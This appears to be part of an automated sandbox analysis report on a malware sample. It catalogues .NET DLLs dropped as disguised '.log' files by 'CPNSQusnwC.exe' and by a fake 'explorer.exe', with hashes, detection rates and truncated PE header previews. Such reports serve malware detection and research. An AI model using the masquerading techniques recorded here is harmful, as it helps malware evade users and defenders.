                                                      SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                      MD5:16B480082780CC1D8C23FB05468F64E7
                                                      SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                      SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                      SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                      C:\Users\user\Desktop\cSkqvYkZ.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):24576
                                                      Entropy (8bit):5.535426842040921
                                                      Encrypted:false
                                                      SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                      MD5:5420053AF2D273C456FB46C2CDD68F64
                                                      SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                      SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                      SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\dGozhlgX.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):22016
                                                      Entropy (8bit):5.41854385721431
                                                      Encrypted:false
                                                      SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                      MD5:BBDE7073BAAC996447F749992D65FFBA
                                                      SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                      SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                      SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\eJSyBaRc.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):89600
                                                      Entropy (8bit):5.905167202474779
                                                      Encrypted:false
                                                      SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                      MD5:06442F43E1001D860C8A19A752F19085
                                                      SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                      SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                      SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                      C:\Users\user\Desktop\ejwQzjeb.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):23552
                                                      Entropy (8bit):5.529329139831718
                                                      Encrypted:false
                                                      SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                      MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                      SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                      SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                      SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\fJbhCUkS.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):342528
                                                      Entropy (8bit):6.170134230759619
                                                      Encrypted:false
                                                      SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                      MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                      SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                      SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                      SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\gljzVSiX.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):64000
                                                      Entropy (8bit):5.857602289000348
                                                      Encrypted:false
                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\hovXJzGK.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):46592
                                                      Entropy (8bit):5.870612048031897
                                                      Encrypted:false
                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\jWOPcftP.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):22016
                                                      Entropy (8bit):5.41854385721431
                                                      Encrypted:false
                                                      SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                      MD5:BBDE7073BAAC996447F749992D65FFBA
                                                      SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                      SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                      SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\liYyiBRH.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33280
                                                      Entropy (8bit):5.634433516692816
                                                      Encrypted:false
                                                      SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                      MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                      SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                      SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                      SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\nDhGzpaM.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):38912
                                                      Entropy (8bit):5.679286635687991
                                                      Encrypted:false
                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\nTDOpObA.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):342528
                                                      Entropy (8bit):6.170134230759619
                                                      Encrypted:false
                                                      SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                      MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                      SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                      SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                      SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\pxxplmMK.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32256
                                                      Entropy (8bit):5.631194486392901
                                                      Encrypted:false
                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\qVqwKxgw.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33792
                                                      Entropy (8bit):5.541771649974822
                                                      Encrypted:false
                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\sUqvPban.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):70144
                                                      Entropy (8bit):5.909536568846014
                                                      Encrypted:false
                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\scaNtKAs.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):64000
                                                      Entropy (8bit):5.857602289000348
                                                      Encrypted:false
                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\tQeVfYwq.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):38912
                                                      Entropy (8bit):5.679286635687991
                                                      Encrypted:false
                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\uNFeAYLl.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):50176
                                                      Entropy (8bit):5.723168999026349
                                                      Encrypted:false
                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\uaPNCQpm.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):24576
                                                      Entropy (8bit):5.535426842040921
                                                      Encrypted:false
                                                      SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                      MD5:5420053AF2D273C456FB46C2CDD68F64
                                                      SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                      SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                      SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\ufMwPuFo.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33792
                                                      Entropy (8bit):5.541771649974822
                                                      Encrypted:false
                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\vEieQmso.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):89600
                                                      Entropy (8bit):5.905167202474779
                                                      Encrypted:false
                                                      SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                      MD5:06442F43E1001D860C8A19A752F19085
                                                      SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                      SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                      SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 16%
